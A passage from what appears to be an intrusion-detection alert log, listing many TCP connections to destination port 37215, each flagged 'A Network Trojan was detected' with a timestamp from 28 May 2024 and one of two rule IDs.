                  Source Port:51338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849083
                  SID:2835222
                  Source Port:53876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528276
                  SID:2835222
                  Source Port:37020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651729
                  SID:2829579
                  Source Port:51850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907491
                  SID:2829579
                  Source Port:58174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555561
                  SID:2835222
                  Source Port:41306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316241
                  SID:2835222
                  Source Port:51948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796854
                  SID:2835222
                  Source Port:42766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537474
                  SID:2835222
                  Source Port:36740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880046
                  SID:2829579
                  Source Port:36864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.353787
                  SID:2835222
                  Source Port:55526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300882
                  SID:2835222
                  Source Port:49762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910500
                  SID:2829579
                  Source Port:35694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800656
                  SID:2829579
                  Source Port:42696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315620
                  SID:2829579
                  Source Port:52216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312478
                  SID:2829579
                  Source Port:58988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529947
                  SID:2835222
                  Source Port:45556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628313
                  SID:2829579
                  Source Port:35452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887432
                  SID:2829579
                  Source Port:52122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788952
                  SID:2829579
                  Source Port:39738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769303
                  SID:2829579
                  Source Port:36048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810492
                  SID:2829579
                  Source Port:56438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908638
                  SID:2829579
                  Source Port:36222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659642
                  SID:2829579
                  Source Port:57760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887967
                  SID:2835222
                  Source Port:38022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.575988
                  SID:2829579
                  Source Port:47074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719441
                  SID:2835222
                  Source Port:43176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547622
                  SID:2829579
                  Source Port:40016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543467
                  SID:2835222
                  Source Port:35956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555670
                  SID:2829579
                  Source Port:35630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912218
                  SID:2835222
                  Source Port:45398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817777
                  SID:2829579
                  Source Port:59796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720296
                  SID:2829579
                  Source Port:33070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586505
                  SID:2835222
                  Source Port:38702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660541
                  SID:2835222
                  Source Port:37838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665013
                  SID:2835222
                  Source Port:33580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651064
                  SID:2829579
                  Source Port:52304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911586
                  SID:2835222
                  Source Port:50928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489849
                  SID:2835222
                  Source Port:50654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859377
                  SID:2829579
                  Source Port:38326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577736
                  SID:2829579
                  Source Port:57028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703002
                  SID:2829579
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788333
                  SID:2835222
                  Source Port:41066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911606
                  SID:2835222
                  Source Port:39274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547661
                  SID:2829579
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527347
                  SID:2835222
                  Source Port:42484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.792169
                  SID:2829579
                  Source Port:58528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577242
                  SID:2835222
                  Source Port:59126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660077
                  SID:2829579
                  Source Port:52742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319593
                  SID:2829579
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652053
                  SID:2829579
                  Source Port:47836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845085
                  SID:2835222
                  Source Port:51580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767844
                  SID:2835222
                  Source Port:36808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906096
                  SID:2829579
                  Source Port:38370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604126
                  SID:2835222
                  Source Port:37928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870693
                  SID:2829579
                  Source Port:54360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795542
                  SID:2835222
                  Source Port:37570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907487
                  SID:2835222
                  Source Port:44306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292647
                  SID:2835222
                  Source Port:51698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576947
                  SID:2829579
                  Source Port:57830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694954
                  SID:2835222
                  Source Port:38672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315920
                  SID:2829579
                  Source Port:46240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490034
                  SID:2835222
                  Source Port:40250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489745
                  SID:2835222
                  Source Port:38116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577609
                  SID:2835222
                  Source Port:52226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791255
                  SID:2835222
                  Source Port:54098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795685
                  SID:2829579
                  Source Port:37434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849076
                  SID:2835222
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2829579
                  Source Port:38958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629184
                  SID:2829579
                  Source Port:42638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786497
                  SID:2829579
                  Source Port:53570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490393
                  SID:2829579
                  Source Port:57230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527505
                  SID:2829579
                  Source Port:47522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696299
                  SID:2829579
                  Source Port:44628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277853
                  SID:2835222
                  Source Port:49456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.353814
                  SID:2829579
                  Source Port:33206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586091
                  SID:2835222
                  Source Port:41698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886805
                  SID:2829579
                  Source Port:40348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494768
                  SID:2829579
                  Source Port:33812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.793265
                  SID:2829579
                  Source Port:34446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488149
                  SID:2829579
                  Source Port:37446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650996
                  SID:2829579
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809993
                  SID:2829579
                  Source Port:52784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907509
                  SID:2835222
                  Source Port:54664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491903
                  SID:2835222
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.801987
                  SID:2835222
                  Source Port:43614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489338
                  SID:2835222
                  Source Port:60906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703064
                  SID:2835222
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649858
                  SID:2829579
                  Source Port:34892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845949
                  SID:2829579
                  Source Port:45218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528193
                  SID:2835222
                  Source Port:54072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742652
                  SID:2829579
                  Source Port:41316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610322
                  SID:2829579
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590429
                  SID:2835222
                  Source Port:33022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659932
                  SID:2829579
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910454
                  SID:2835222
                  Source Port:52388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788080
                  SID:2829579
                  Source Port:33930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577912
                  SID:2835222
                  Source Port:55442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696637
                  SID:2835222
                  Source Port:59824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488626
                  SID:2829579
                  Source Port:32804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535984
                  SID:2835222
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584676
                  SID:2829579
                  Source Port:55858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696028
                  SID:2835222
                  Source Port:38460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910536
                  SID:2835222
                  Source Port:49388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494504
                  SID:2835222
                  Source Port:50624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586132
                  SID:2835222
                  Source Port:40232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601990
                  SID:2835222
                  Source Port:50394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627791
                  SID:2835222
                  Source Port:52656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536080
                  SID:2835222
                  Source Port:53404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719711
                  SID:2829579
                  Source Port:47548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874013
                  SID:2829579
                  Source Port:39162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694844
                  SID:2829579
                  Source Port:42820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788316
                  SID:2835222
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555545
                  SID:2829579
                  Source Port:50382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491831
                  SID:2835222
                  Source Port:38300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528981
                  SID:2835222
                  Source Port:37874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766079
                  SID:2835222
                  Source Port:44090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.792740
                  SID:2835222
                  Source Port:40312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702953
                  SID:2835222
                  Source Port:32958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299107
                  SID:2835222
                  Source Port:46066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682925
                  SID:2835222
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555616
                  SID:2829579
                  Source Port:34848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920009
                  SID:2829579
                  Source Port:32962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846645
                  SID:2835222
                  Source Port:47516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907619
                  SID:2835222
                  Source Port:40012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720296
                  SID:2829579
                  Source Port:56830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887331
                  SID:2835222
                  Source Port:60702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.719210
                  SID:2829579
                  Source Port:47230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660420
                  SID:2835222
                  Source Port:60906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296003
                  SID:2829579
                  Source Port:41282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578711
                  SID:2829579
                  Source Port:50184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529064
                  SID:2835222
                  Source Port:38816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847591
                  SID:2835222
                  Source Port:39176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296628
                  SID:2829579
                  Source Port:55268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912127
                  SID:2829579
                  Source Port:37366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930394
                  SID:2835222
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888630
                  SID:2835222
                  Source Port:60380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900444
                  SID:2835222
                  Source Port:48472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719149
                  SID:2829579
                  Source Port:38526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720722
                  SID:2835222
                  Source Port:48990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651454
                  SID:2835222
                  Source Port:54402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796800
                  SID:2829579
                  Source Port:56086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767772
                  SID:2829579
                  Source Port:37060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628050
                  SID:2835222
                  Source Port:50240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796574
                  SID:2835222
                  Source Port:58542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785807
                  SID:2835222
                  Source Port:38446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276811
                  SID:2829579
                  Source Port:57352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453747
                  SID:2835222
                  Source Port:34414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785792
                  SID:2835222
                  Source Port:55906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278057
                  SID:2829579
                  Source Port:45910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766466
                  SID:2835222
                  Source Port:58656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650918
                  SID:2835222
                  Source Port:59662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651740
                  SID:2835222
                  Source Port:57448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846745
                  SID:2835222
                  Source Port:53334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912547
                  SID:2835222
                  Source Port:44214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789480
                  SID:2829579
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908590
                  SID:2829579
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577751
                  SID:2829579
                  Source Port:60628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651019
                  SID:2835222
                  Source Port:35242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628854
                  SID:2835222
                  Source Port:34086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696027
                  SID:2829579
                  Source Port:55432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720783
                  SID:2829579
                  Source Port:57962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907933
                  SID:2829579
                  Source Port:44664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651466
                  SID:2829579
                  Source Port:60070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695774
                  SID:2829579
                  Source Port:48042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543456
                  SID:2829579
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.916182
                  SID:2829579
                  Source Port:45128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.670712
                  SID:2835222
                  Source Port:51548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316367
                  SID:2829579
                  Source Port:55000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596435
                  SID:2835222
                  Source Port:47224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578445
                  SID:2835222
                  Source Port:38760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930394
                  SID:2835222
                  Source Port:56362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555368
                  SID:2829579
                  Source Port:34902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583390
                  SID:2835222
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548199
                  SID:2835222
                  Source Port:58766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316539
                  SID:2835222
                  Source Port:57862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530210
                  SID:2829579
                  Source Port:51284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576100
                  SID:2835222
                  Source Port:36958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729721
                  SID:2829579
                  Source Port:48140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649875
                  SID:2835222
                  Source Port:38864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294595
                  SID:2829579
                  Source Port:48888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316499
                  SID:2835222
                  Source Port:49444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742314
                  SID:2835222
                  Source Port:50926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586351
